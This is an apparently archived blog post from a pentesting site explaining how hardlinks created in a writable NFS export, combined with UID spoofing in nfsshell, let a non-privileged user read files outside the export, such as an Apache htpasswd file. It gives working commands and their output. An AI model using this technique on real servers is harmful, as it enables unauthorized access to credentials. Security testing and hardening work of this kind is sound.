{"id":63,"date":"2008-08-16T23:51:01","date_gmt":"2008-08-16T23:51:01","guid":{"rendered":"http:\/\/pentestmonkey.net\/?p=63"},"modified":"2011-08-20T15:43:22","modified_gmt":"2011-08-20T15:43:22","slug":"nfs-hardlink","status":"publish","type":"post","link":"https:\/\/pentestmonkey.net\/blog\/nfs-hardlink","title":{"rendered":"Abusing Hardlinks Via NFS"},"content":{"rendered":"<p>If you&#8217;ve been doing network pentesting for a while, you&#8217;ll no doubt be aware that there are plenty of ways to configure NFS insecurely.\u00a0 Here are a few examples:<\/p>\n<ul>\n<li>If you export \/home and allow read-write access: Attackers can read everyone&#8217;s home directories, alter them and probably log in as any user.<\/li>\n<li>If an attacker has a non-priv logon and write access to an NFS share he can impersonate any non-root user&#8230; unless you set the nosuid or noexec mount option on the exported file system.<\/li>\n<li>If an attacker has a non-priv logon and write access to an NFS share he can create device files and perform raw read\/writes to disks, kmem, etc&#8230; unless you set the nodev mount option on the exported file system.<\/li>\n<\/ul>\n<p>Another technique just occured to me that I don&#8217;t recall hearing about before: Under some conditions an attacker could create hardlinks to gain read\/write access to files <em>outsite<\/em> of the exported directory.\u00a0 The rest of this post discusses this attack in more detail.<\/p>\n<p><!--more--><\/p>\n<h3>What&#8217;s A Hardlink?<\/h3>\n<p>According to wikipedia a <a href=\"http:\/\/en.wikipedia.org\/wiki\/Hard_link\">hardlink<\/a> is:<\/p>\n<p>&#8220;&#8230; a reference, or pointer, to physical data on a storage volume. On most file systems, all named files are hard links. The name associated with the file is simply a label that refers the operating system to the actual data. As such, more than one name can be associated with the same data. Though called by different names, any changes made will affect the actual data, regardless of how the file is called at a later time. Hard links can only refer to data that exists on the same file system. &#8221;<\/p>\n<p>Any user can create a hardlink using the &#8220;ln&#8221; command (I&#8217;m using Linux.\u00a0 Other Unixes are similar, though):<\/p>\n<pre>$ ln \/etc\/passwd password-hardlink\r\n$ ls -l passwd-hardlink\r\n-rw-r--r-- 4 root root 2854 Aug\u00a0 9 13:18 passwd-hardlink<\/pre>\n<p>You just need write access to the place you&#8217;re writing the link and to and to be able to traverse the parent directories of the target file &#8211; you don&#8217;t need read access to the target file.<\/p>\n<h3>How do Hardlinks Help Me Access Files During A Pentest?<\/h3>\n<p>The following conditions need to be met for the &#8220;hardlink&#8221; technique to work:<\/p>\n<ul>\n<li>You&#8217;ve got write access to an NFS share<\/li>\n<li>You&#8217;ve got a non-priv logon for the NFS server that can write to the NFS share<\/li>\n<li>You want to read\/write a file that is <em>not<\/em> in the NFS exported directory.\u00a0 The target file (probably) needs to be read\/writable by a non-root user because root_squash is normally turned on.\u00a0 NB: If the target file <em>is<\/em> on the NFS export, simple UID\/GID manipulation will get you what you need &#8211; you don&#8217;t need the &#8220;hardlink&#8221; attack.<\/li>\n<li>You&#8217;ve found that the nosuid and nodev options are being used (if they aren&#8217;t, then there are better attacks than this one you could use).<\/li>\n<\/ul>\n<p>We&#8217;ll illustrate te technique with an example:<\/p>\n<ul>\n<li>Log into the target system using your non-priv account and identify a file that you want to read\/write but can&#8217;t.\u00a0 Remember that you can&#8217;t pick \/etc\/shadow because you a need a file that&#8217;s read\/writable by a non-root user (NFS&#8217;s root_squash option means that root&#8217;s files are safe).\u00a0 By way of an example, image you&#8217;ve found the file \/etc\/apache2\/site-htpasswd and would like to read it.<\/li>\n<\/ul>\n<pre>$ ls -l \/etc\/apache2\/site-htpasswd\r\n-rw------- 1 apache apache 123 Jul\u00a0 9 20:02 \/etc\/apache2\/site-htpasswd<\/pre>\n<ul>\n<li>\u00a0While you&#8217;re still logged in, locate the NFS exported directory and write a hardlink in there to the target file.<\/li>\n<\/ul>\n<pre>$ cd \/some\/exported\/dir\/\r\n$ ln \/etc\/apache2\/site-htpasswd myhardlink\r\n$ ls -l\u00a0 myhardlink\r\n-rw------- 1 apache apache 123 Jul\u00a0 9 20:02 myhardlink<\/pre>\n<ul>\n<li>Finally, access the hardlink via the NFS share.\u00a0 In this case we&#8217;ll need to lie to the NFS server about our UID.\u00a0 We&#8217;ll use nfsshell, but you could just mount the NFS share normally and create a local account with the appropriate UID.<\/li>\n<\/ul>\n<pre>$ sudo nfs\r\nnfs&gt; host 10.0.0.1\r\nUsing a privileged port (1021)\r\nOpen 10.0.0.1 (10.0.0.1) TCP\r\nnfs&gt; mount \/some\/exported\/dir\/\r\nUsing a privileged port (1020)\r\nMount `\/some\/expored\/dir\/', TCP, transfer size 8192 bytes.\r\nnfs&gt; ls -l\r\ndrwxr-xr-x1002\u00a0\u00a0\u00a0\u00a0 1024\u00a0\u00a0\u00a0\u00a0 0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 1\u00a0 Aug 16 23:34\u00a0 .\r\ndrwxr-xr-x\u00a0 0\u00a0\u00a0\u00a0\u00a0 1024\u00a0\u00a0\u00a0\u00a0 0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 1\u00a0 Aug 16 23:31\u00a0 ..\r\n-rw-------   80    123     0         1 Jul\u00a0 9 20:02 myhardlink\r\nnfs&gt; uid 80\r\nnfs&gt; get myhardlink\r\nmyhardlink? y\r\nnfs&gt;<\/pre>\n<h3>Limitations<\/h3>\n<p>You have to be able to traverse the parent directories of target file (i.e. have +x permission on the parent dirs) in order to create the hardlink.\u00a0 This attack will therefore not allow you to read files in other user&#8217;s home directories if the home directories have 700 permissions.<\/p>\n<p>You can only read files on the same partition as the NFS-exported directory.\u00a0 There&#8217;s no problem if the there is only one partition in use &#8211; as is common on Linux installations.\u00a0 If, however \/home was a separate partition, you wouldn&#8217;t be able to create hardlinks to \/var\/log\/messages for example as the target file is on a different parition.<\/p>\n<p>\/dev is a separate file system, so you cannot do raw read\/writes to disk devices even though they&#8217;re often read\/writable by the &#8220;disk&#8221; group or similar.<\/p>\n<p>If root_squash in enabled (it normally is), you won&#8217;t be able to access files that are only accessible by the root user.\u00a0 If root_squash is not enabled, though, you should be able to easily read\/write to \/etc\/shadow and \/etc\/passwd.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>If you&#8217;ve been doing network pentesting for a while, you&#8217;ll no doubt be aware that there are plenty of ways to configure NFS insecurely.\u00a0 Here are a few examples: If you export \/home and allow read-write access: Attackers can read everyone&#8217;s home directories, alter them and probably log in as any user. If an attacker [&hellip;]<\/p>\n","protected":false},"author":3,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[5],"tags":[82,19],"_links":{"self":[{"href":"https:\/\/pentestmonkey.net\/wp-json\/wp\/v2\/posts\/63"}],"collection":[{"href":"https:\/\/pentestmonkey.net\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/pentestmonkey.net\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/pentestmonkey.net\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/pentestmonkey.net\/wp-json\/wp\/v2\/comments?post=63"}],"version-history":[{"count":2,"href":"https:\/\/pentestmonkey.net\/wp-json\/wp\/v2\/posts\/63\/revisions"}],"predecessor-version":[{"id":331,"href":"https:\/\/pentestmonkey.net\/wp-json\/wp\/v2\/posts\/63\/revisions\/331"}],"wp:attachment":[{"href":"https:\/\/pentestmonkey.net\/wp-json\/wp\/v2\/media?parent=63"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/pentestmonkey.net\/wp-json\/wp\/v2\/categories?post=63"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/pentestmonkey.net\/wp-json\/wp\/v2\/tags?post=63"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}